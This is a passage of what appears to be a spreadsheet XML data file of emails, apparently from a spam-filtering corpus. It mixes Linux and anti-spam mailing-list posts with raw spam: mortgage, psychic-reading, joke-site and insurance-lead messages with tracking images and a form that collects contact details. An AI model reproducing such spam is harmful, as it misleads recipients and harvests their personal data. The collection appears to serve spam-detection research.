 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;Saf-E =
 Mail Systems, PO Box 116-3015 San Rafael de Heredia, =
 CR&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;&lt;hr WIDTH=3D"600"&gt;&lt;/center&gt;
 &lt;/HTML&gt;
 ------=_NextPart_480_83855460462270663--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Have mass-check remove X-Spam-* headers?
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt; except for 1 thing: defanged MIME messages.  that's a big problem.
 &gt; but if you didn't just *remove* the headers and instead reverted
 &gt; back to the X-Spam-Prev versions, it'd more-or-less work.
 &gt; 
 &gt; (BTW fixed the downloads page ;)
 &amp;check now un-defangs MIME -- it was screwing up some of my mass-check
 results (where SA-markup was present, yes).
 If there ever was a warning about SA-markup in mass-check, it never
 worked for me.
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: shop your loan to lenders for the best rate        OTQ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;&lt;BODY&gt;&lt;CENTER&gt;
 &lt;A href=3D"http://reallymarket.com/user0201/index.asp?Afft=3DQM10"&gt;
 &lt;IMG src=3D"http://61.129.68.17/mortad2.gif" border=3D0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D1&gt;
 Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer like us
 to contact you or feel that you have&lt;BR&gt;received this email in error,
 please &lt;A href=3D"http://reallymarket.com/light/watch.asp"&gt;click here
 to unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: ALSA (almost) made easy (gamix rocks)
</t>
  </si>
  <si>
    <t xml:space="preserve">This mixer is specific to ALSA's special stuff, I use it in addition to the other
 mixers if I need something special.
 I built it a while ago, may need a --rebuild.
 http://www.dudex.net/rpms/gamix-1.99.p13-aap1.i686.rpm
 http://www.dudex.net/rpms/gamix-1.99.p13-aap1.src.rpm
 http://www.dudex.net/rpms/gamix.spec
 Matthias Saou (matthias@egwn.net) wrote*:
 &gt;
 &gt;Once upon a time, Ville wrote :
 &gt;
 &gt;&gt; Ah!  The mixer stuff was what made me look for an init script in the
 &gt;&gt; first place, I didn't bother to check whether the existing stuff would
 &gt;&gt; have worked with that.  Will try that out, you can assume silence ==
 &gt;&gt; success :)
 &gt;
 &gt;Well, from what I've tried, both the main and the PCM (at least) volume
 &gt;levels can be controlled either by "alsamixer" or the good old "aumix".
 &gt;
 &gt;&gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks,
 &gt;&gt; &gt; &gt;especially
 &gt;&gt; &gt; since having a full OSS compatibility results that it breaks nothing at
 &gt;&gt; &gt; all! :-)
 &gt;&gt;
 &gt;&gt; Agreed.  Though with only 2 hours experience...
 &gt;
 &gt;I guess/hope some other people from the list will try it out ;-)
 &gt;
 &gt;Both problems you reported (libasound.so and wrong xine dependency) are now
 &gt;fixed in the current packages.
 &gt;
 &gt;Oh, it's maybe also worth pointing out : I've implemented at last sorting
 &gt;by both last change date and alphabetically for my "build list" in the php
 &gt;code : http://freshrpms.net/builds/
 &gt;
 &gt;And yes, I accept patches/comments/suggestions about all those spec files!
 &gt;
 &gt;Matthias
 &gt;
 &gt;
 &gt;_______________________________________________
 &gt;RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt;
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] why false positives are twenty times worse than false negatives
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.editorandpublisher.com/editorandpublisher/features_columns/articl
 e_display.jsp?vnu_content_id=1570036
 (or http://makeashorterlink.com/?A1D525B61 if that URL wrapped)
 rOD.
 --
 "If I was a front porch swing, would you let me hang?
  If I was a dancefloor, would you shake your thang?
  If I was a rubber check, would you let me bounce
  Up and down inside your bank account?"
 &gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;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</si>
  <si>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Subject: [SACVS] CVS: spamassassin/masses mass-check,1.67,1.67.2.1
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/masses
 In directory usw-pr-cvs1:/tmp/cvs-serv440/masses
 Modified Files:
       Tag: b2_4_0
 	mass-check 
 Log Message:
 Fixes, additions to mass-check
 Index: mass-check
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/masses/mass-check,v
 retrieving revision 1.67
 retrieving revision 1.67.2.1
 diff -b -w -u -d -r1.67 -r1.67.2.1
 --- mass-check	20 Aug 2002 12:29:32 -0000	1.67
 +++ mass-check	22 Aug 2002 18:13:30 -0000	1.67.2.1
 @@ -96,6 +96,7 @@
  print "# mass-check results from $who\@$where, on $when\n";
  print "# M:SA version ".$spamtest-&gt;Version()."\n";
 +print '# CVS tag: $Name$',"\n";
  $iter-&gt;set_function (\&amp;wanted);
  $iter-&gt;run (@ARGV);
  exit;
 @@ -132,6 +133,8 @@
    my $tests = $status-&gt;get_names_of_tests_hit();
    $tests = join(',', sort(split(/,/, $tests)));
 +
 +  $id =~ s/\s/_/g;
    printf "%s %2d %s %s\n",
  		    ($yorn ? 'Y' : '.'),
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1600470190P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Wed, 24 Jul 2002 11:34:52 +0200
 &gt;
 &gt; The following patch removes Ftoc_RescanLine in favour of a 
 &gt; Ftoc_RescanLines. It runs scan(1) on a list of lines and updates ftoc 
 &gt; accordingly. The patch also changes all the callers to make use of it.
 &gt; 
 &gt; It also changes Ftoc_ClearCurrent to work of an argument instead of 
 &gt; falsily clearing a message that's still Current on disk. All in an 
 &gt; effort to get a one-to-one disk-display correspondence.
 &gt; 
 &gt; It does add ~30 -- ~ 75 ms (~&lt;10%) to the execution time depending on 
 &gt; folder size due to the invocation of scan. However this version does 
 &gt; not try to second guess the mh version of scan so if you have exotic 
 &gt; scanlines it tells the truth. As a side effect the '+' sign now 
 &gt; corresponds better to what's on disk.
 &gt; 
 &gt; Comments appreciated. I'm going to be offlike for a couple of days, 
 &gt; so I send the cvs diff rather than putting it in the cvs.
 Okay, I've just patched and sourced it into my running exmh, so I'll let you 
 know if anything breaks.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1600470190P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9PsaDK9b4h5R0IUIRAlnZAJ9uyst86+8R7mzxf3yWJeNv9AHe6ACdHAeC
 IkGCzBzaFuPg7EWgIeLNEJM=
 =0S4w
 -----END PGP SIGNATURE-----
 --==_Exmh_1600470190P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Find Peace, Harmony, Tranquility, And Happiness Right Now!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body bgcolor=3Dblack&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D5 align=3Dcenter&gt;&lt;tr&gt;&lt;th b=
 gcolor=3D"#8FB3C5"&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D5 align=3Dcenter&gt;&lt;tr&gt;&lt;th b=
 gcolor=3D"#000000"&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 align=3Dcenter&gt;
 &lt;tr&gt;
 &lt;th&gt;&lt;a href=3D"http://psychicrevenue.com/cgi-bin/refer.cgi?pws01014&amp;site=3D=
 pw"&gt;
 &lt;img src=3D"http://giftedpsychic.com/images/r1c1.jpg" width=3D279 height=3D=
 286 border=3D0&gt;&lt;/a&gt;&lt;/th&gt;
 &lt;th&gt;&lt;a href=3D"http://psychicrevenue.com/cgi-bin/refer.cgi?pws01014&amp;site=3D=
 pw"&gt;
 &lt;img src=3D"http://giftedpsychic.com/images/r1c2.gif" width=3D301 height=3D=
 286 border=3D0&gt;&lt;/a&gt;&lt;/th&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;th&gt;&lt;a href=3D"http://psychicrevenue.com/cgi-bin/refer.cgi?pws01014&amp;site=3D=
 pw"&gt;
 &lt;img src=3D"http://giftedpsychic.com/images/r2c1.jpg" width=3D279 height=3D=
 94 border=3D0&gt;&lt;/a&gt;&lt;/th&gt;
 &lt;th&gt;&lt;a href=3D"http://psychicrevenue.com/cgi-bin/refer.cgi?pws01014&amp;site=3D=
 pw"&gt;
 &lt;img src=3D"http://giftedpsychic.com/images/r2c2.jpg" width=3D301 height=3D=
 94 border=3D0&gt;&lt;/a&gt;&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/table&lt;/th&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
 &gt; &gt; hmm, I've never used gentoo
 &gt; &gt; so I'll have to take your word
 &gt; &gt; on that.  Perhaps something
 &gt; &gt; similar to that Ximian RedHat
 &gt; &gt; dealy would be cool.  Like
 &gt; &gt; a gui installer for slackware![1]
 &gt; &gt;
 &gt; &gt; ;]
 &gt; &gt;
 &gt; &gt; shane
 &gt; &gt;
 &gt; &gt; [1]I'm shure Patrick V. would love
 &gt; &gt; that.(not)
 &gt; 
 &gt; Or slackware with ports... not portage.
 Where ports==FreeBSD like and portage==Gentoo style, perhaps some would
 regard that as a retrograde step.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;snip&gt;
 &gt;Tracking it down showed that my
 &gt;predecessor's "add new entries to the end of its linked list" function
 &gt;recursively called itself with each following link until the terminating
 &gt;one showed up. Of course it died miserably when it ran out of stack. I'm
 &gt;sure he felt he'd done a good days work when he planted that bomb for
 &gt;me.
 /Enter the rant.
 One thing that really bugs me is when people say things like.
 "On the machies we have these days you don't have to worry about
  writing optimised code" or "don't worry about writing
  things inline, just use a function"
 "Yeah and add a procedure prolog or eight", I always counter,
 to be told
 "On the machines we have these days....."
 Boggle.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Funny
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey,  I just wanted to tell you about a GREAT website.  http://www.metrojokes.com    Features lots of jokes!  Extremly unique features and classified in categories.  I appriciate your time.
 Thank you
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free LTC "Sales Closers"
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_109E99_01C2371D.2AAD3990
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  FREE
  LTC "Sales Closers"=09
  Just tell us which sales closer you would like us to send you!=09
  	 Our state-of-the art Point-Of-Sale CD ROM
 Which virtually sells Long Term Care to your clients! This turnkey
 presentation prepares your client for the sale. It has both video and
 audio, so you just sit back, run the presentation, and get the
 applications ready.=20
  =09
  We're also offering our flip chart version of this presentation=09
 The same great tool in a flip chart format with a
 complete script to keep you on track.
  	The choice is yours ? choose one of these great LTC
 Point-of-Sale items. Which gift would you like? All you have to do is
 complete appointment paperwork with M&amp;O Marketing.
 Respond to this e-mail or call us today and we will send over the
 paperwork for one of our top carriers. Remember -- We train our agents
 on products - free - and we also give at least a $50 commission bonus
 for every app you send us.=94=20
  866-503-0250 ext. 0
 =20
 For agent use only. =09
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  =09
 ------=_NextPart_000_109E99_01C2371D.2AAD3990
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free LTC "Sales Closers"&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#003399" align=3D"center"&gt;
     &lt;tr&gt;=20
       &lt;td&gt;=20
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt; &lt;img src=3D"http://iiq.us/images/m_o/20020708-2.gif" =
 width=3D"550" height=3D"137" alt=3D"FREE"&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/m_o/20020708-1.gif" =
 width=3D"550" height=3D"58" alt=3D"LTC &amp;quot;Sales Closers&amp;quot;"&gt;=20
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt; &lt;img src=3D"http://iiq.us/images/m_o/closer01.gif" =
 width=3D"550" height=3D"84" alt=3D"Just tell us which sales closer you =
 would like us to send you!"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"158"&gt;&lt;img =
 src=3D"http://iiq.us/images/m_o/chart.gif" width=3D"179" =
 height=3D"187"&gt;&lt;/td&gt;
             &lt;td width=3D"208" valign=3D"top"&gt;=20
               &lt;p align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/m_o/tag1.gif" width=3D"192" height=3D"61" =
 alt=3D'Our state-of-the art Point-Of-Sale CD ROM'&gt;&lt;br&gt;
                 &lt;font size=3D"2"&gt;Which virtually sells Long Term Care to =
 your clients!=20
                 This turnkey presentation prepares your client for the =
 sale. It=20
                 has both video and audio, so you just sit back, run the =
 presentation,=20
                 and get the applications ready. &lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
             &lt;td width=3D"184"&gt;&lt;img =
 src=3D"http://iiq.us/images/m_o/cd.jpg" width=3D"179" =
 height=3D"187"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/m_o/tag2.gif" =
 width=3D"550" height=3D"57" alt=3D"We're also offering our flip chart =
 version of this presentation"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;p align=3D"center"&gt;&lt;font size=3D"2"&gt;
                 The same great tool in a flip chart format with a&lt;br&gt;
                 complete script to keep you on track.&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"12"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"176"&gt;&lt;img =
 src=3D"http://iiq.us/images/m_o/forms.gif" width=3D"179" =
 height=3D"192"&gt;&lt;/td&gt;
             &lt;td width=3D"374"&gt;=20
               &lt;font size=3D"2"&gt;&lt;p&gt;The choice is yours &amp;#150; choose one =
 of these great=20
                 LTC Point-of-Sale items. Which gift would you like? All =
 you have=20
                 to do is complete appointment paperwork with M&amp;amp;O =
 Marketing.&lt;/p&gt;
               &lt;p&gt;Respond to this e-mail or call us today and we will =
 send over=20
                 the paperwork for one of our top carriers. Remember -- =
 We train=20
                 our agents on products - free - and we also give at =
 least a $50=20
                 commission bonus for every app you send us." &lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"3"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
               &lt;img src=3D"http://iiq.us/images/m_o/20020708-3.gif" =
 width=3D"540" height=3D"90" alt=3D"866-503-0250 ext. 0"&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/m_o/logo.gif" =
 width=3D"192" height=3D"76"&gt;&lt;br&gt;
               &lt;font size=3D"1"&gt;For agent use only.&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#003399"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF"&gt;Please fill out the form below for =
 more information&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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value=3D"marketing@mandomarketing.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"M&amp;O LTC Response"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"6"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt; &lt;font size=3D"1"&gt;We don't want anybody =
 to receive=20
               our mailing who does not wish to receive them. This is a =
 professional=20
               communication sent to insurance professionals. To be =
 removed from=20
               this mailing list, DO NOT REPLY to this message. Instead, =
 go here:=20
               &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
               &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_109E99_01C2371D.2AAD3990--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Forged email address
</t>
  </si>
  <si>
    <t xml:space="preserve">I received a spam email that had apparently forged the From header with
 my own email address. After reviewing the message I forwarded it with
 the rest of a batch of spam ti the database with razor-report. Now of,
 course, my own email address is listed int he Razor database. How do I
 go about getting it removed.
 I have seen this ploy (forged From headers) several time since then.
 Perhaps the razor-report need to detect this and emit a warning.
 dave
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] Re: [Python-Dev] Getting started with GBayes testing 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt; Tim Peters wrote
 &gt; &gt; I've actually got a bunch of spam like that. The text/plain is something
 &gt; &gt; like
 &gt; &gt;
 &gt; &gt; **This is a HTML message**
 &gt; &gt;
 &gt; &gt; and nothing else.
 &gt; 
 &gt; Are you sure that's in a text/plain MIME section?  I've seen that many times
 &gt; myself, but it's always been in the prologue (*between* MIME sections -- so
 &gt; it's something a non-MIME aware reader will show you).
 *nod* I know - on my todo is to feed the prologue into the system as well.
 A snippet, hopefully not enough to trigger the spam-filters.
 To: into89j@gin.elax.ekorp.com
 X-Mailer: Microsoft Outlook Express 4.72.1712.3
 X-MimeOLE: Produced By Microsoft MimeOLE V??D.1712.3
 Mime-Version: 1.0
 Date: Sun, 28 Jan 2001 23:54:39 -0500
 Content-Type: multipart/mixed; boundary="----=_NextPart_000_007F_01BDF6C7.FABAC1
 B0"
 Content-Transfer-Encoding: 7bit
 This is a MIME Message
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0
 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.
 FABAC1B0"
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ***** This is an HTML Message ! *****
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!doctype html public "-//w3c//dtd html 4=2E0
  transitional//en"&gt;
  &lt;html&gt;
  &lt;head&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">With the increasing prevalence of web services (not that they are always a
 good thing), I doubt that parsing XML will be something that will remain at
 the Java application layer for long... Recent threads here on Fork
 indicating the move towards hardware parsing or this code even become part
 of the native implementation of Java on various platforms...
 Reza B'Far
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Adam
 L. Beberg
 Sent: Sunday, September 01, 2002 9:01 PM
 To: Mr. FoRK
 Cc: fork@example.com
 Subject: Re: Java is for kiddies
 On Sun, 1 Sep 2002, Mr. FoRK wrote:
 &gt; &gt; 6.  Hardware is getting so fast that I'm not sure if the performance
 &gt; &gt; difference between Java and C/C++ are relevant any more.
 &gt;
 &gt; When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
 &gt; C++ on the same hardware then it does matter.
 Yea, and that on top of the 100x of all the parsing engines over just
 bigendian'ing it and passing the data (5x+++) in the raw. Then it REALLY
 matters.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Content-Type: message/rfc822  supported ?
</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot determine if a verbatim forwarded message from Agent is handled
 correctly i.e. that a message with Content-Type: message/rfc822 does not
 include the original header lines improperly in the email body when reporting
 the spam. It would be really nice and convenient if it supported as the Agent
 verbatim forwarding option is easy to use. 
 SpamCop does understand the format.
 See an examle below:
 - Jrgen
 Return-Path: &lt;un@s.jth.net&gt;
 Delivered-To: jth@jth.net
 Received: from vennely1 (vennely1 [194.192.106.109])
 	by mail.jth.net (Postfix) with SMTP id 17A9118684
 	for &lt;j@jth.net&gt;; Fri, 26 Jul 2002 02:15:03 +0200 (CEST)
 From: =?ISO-8859-1?Q?J=F8rgen_Thomsen?= &lt;un@s.jth.net&gt;
 To: j@jth.net
 Subject: (fwd) [Razor-users] Razor Agents 2.14 Released
 Date: Fri, 26 Jul 2002 02:14:57 +0200
 Message-ID: &lt;o351kukdidthhk6fohls8s6b4j5rfghp3i@4ax.com&gt;
 X-Mailer: Forte Agent 1.91/32.564
 MIME-Version: 1.0
 Content-Type: message/rfc822
 Content-Disposition: inline
 Return-Path: &lt;razor-users-admin@example.sourceforge.net&gt;
 Delivered-To: list@jth.net
 Received: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net
 [216.136.171.252])
 	by mail.jth.net (Postfix) with ESMTP id 88B0F18684
 	for &lt;list@jth.net&gt;; Fri, 26 Jul 2002 01:18:00 +0200 (CEST)
 and the rest of the original header and the body
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: TCPA and Palladium: Content Control for the Masses
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The most significant problem with TCPA and Palladium is not
 &gt; whether they may interfere with the power of the universal
 &gt; logic device, or whether they are effectual from the
 &gt; standpoint of privacy and security concerns, though these
 &gt; are all very important concerns.  Rather, the fundamental
 &gt; problem they present is in the political premises that they
 &gt; hope to implement for the sake of the "content industries."
 	I've been thinking about this sort of thing
 	lately, and how the technological realization
 	of these issues is one that enforces *absolute*
 	control of content, where the original legal
 	strictures (copyright) only enforced a limited
 	time limited right to content.
 	What I'm wondering is this:  if you give
 	people absolute control of copyright, whose
 	works will be around in 100 years?  Because
 	I'm starting to think that the content
 	creator who wants to produce for posterity
 	had better do it in such a way that the
 	content is *not* "protected", or the content
 	will be inaccessible to people in 15 years,
 	much less 100.
 	This of course assumes that the content
 	control mechanisms aren't so pervasive that
 	one *cannot* create content without going
 	through controlled channels.
 	-faisal
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt; 
 &gt;     I have a fresh, new 8.0 install.  I'd like to 'go alsa', but I worry
 &gt;     about screwing it up.  Is this fear founded?  If I could get Alsa, I
 &gt;     could run a bunch of games I've been waiting for years to come
 &gt;     out...like Search &amp; Rescue (available on a Mandrake RPM) and maybe
 &gt;     FlightGear (flight simulator).
 Well, I'm sure you can recompile those game packages without ALSA anyway.
 Also, note that ALSA 0.9.x has just appeared in Mandrake 9.0 and that all
 previous Mandrake releases were using the incompatible, aging and now
 unsupported 0.5.x series. (unless I've misunderstood)
 &gt;     How much 'hacking' is likely required to make it work for an
